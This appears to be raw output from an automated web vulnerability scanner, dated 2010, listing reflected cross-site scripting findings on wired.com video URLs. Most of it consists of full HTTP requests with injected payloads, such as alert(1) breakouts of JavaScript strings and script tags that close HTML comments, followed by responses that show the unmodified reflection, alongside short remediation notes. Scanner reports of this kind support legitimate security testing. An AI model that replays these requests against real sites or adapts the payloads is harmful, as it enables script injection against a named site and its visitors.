GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001878e5"-alert(1)-"ee44701c9fe HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:45 GMT Date: Mon, 22 Nov 2010 00:44:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33fc"><a>f604c53d836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videof33fc"><a>f604c53d836/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29445 Vary: Accept-Encoding Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:40:50 GMT Date: Mon, 22 Nov 2010 00:35:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videof33fc"><a>f604c53d836 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7521e--><script>alert(1)</script>c40066a1c9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29484 Vary: Accept-Encoding Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:41:24 GMT Date: Mon, 22 Nov 2010 00:36:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7521e--><script>alert(1)</script>c40066a1c9e/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bcb"-alert(1)-"aa4a4cfdcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos90bcb"-alert(1)-"aa4a4cfdcc3/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:39 GMT Date: Mon, 22 Nov 2010 00:37:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bdf6"><a>7f3d840db93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2bdf6"><a>7f3d840db93/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2bdf6"><a>7f3d840db93 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dacc"><a>bbb6c95b245 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest7dacc"><a>bbb6c95b245/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:41 GMT Date: Mon, 22 Nov 2010 00:37:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest7dacc"><a>bbb6c95b245"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c4ab"-alert(1)-"e3c870d3eb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest4c4ab"-alert(1)-"e3c870d3eb1/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:26 GMT Date: Mon, 22 Nov 2010 00:38:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e36"-alert(1)-"151a9a358c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663323e36"-alert(1)-"151a9a358c9/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd86"-alert(1)-"f423dd03819 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40safd86"-alert(1)-"f423dd03819/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:17 GMT Date: Mon, 22 Nov 2010 00:39:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd3d"-alert(1)-"0d025cc697d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001ffd3d"-alert(1)-"0d025cc697d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:29 GMT Date: Mon, 22 Nov 2010 00:39:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8b732--><script>alert(1)</script>8de2758f227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:40:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8b732--><script>alert(1)</script>8de2758f227/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941e"><a>8a492733e49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4941e"><a>8a492733e49/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:53 GMT Date: Mon, 22 Nov 2010 00:39:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4941e"><a>8a492733e49 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d79"><a>d7ed01c7cc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos99d79"><a>d7ed01c7cc0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:45:36 GMT Date: Mon, 22 Nov 2010 00:41:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos99d79"><a>d7ed01c7cc0 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa56"-alert(1)-"1f38c6a65a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9fa56"-alert(1)-"1f38c6a65a0/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:46:43 GMT Date: Mon, 22 Nov 2010 00:42:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ype="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbe"><a>ecb0d4f8c5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestc9dbe"><a>ecb0d4f8c5a/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:13 GMT Date: Mon, 22 Nov 2010 00:42:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestc9dbe"><a>ecb0d4f8c5a"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb59"-alert(1)-"95d7e2d9dcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestbeb59"-alert(1)-"95d7e2d9dcd/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:47:59 GMT Date: Mon, 22 Nov 2010 00:43:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106804
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8aeb1"-alert(1)-"b7856853cc1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166338aeb1"-alert(1)-"b7856853cc1/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:35 GMT Date: Mon, 22 Nov 2010 00:43:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
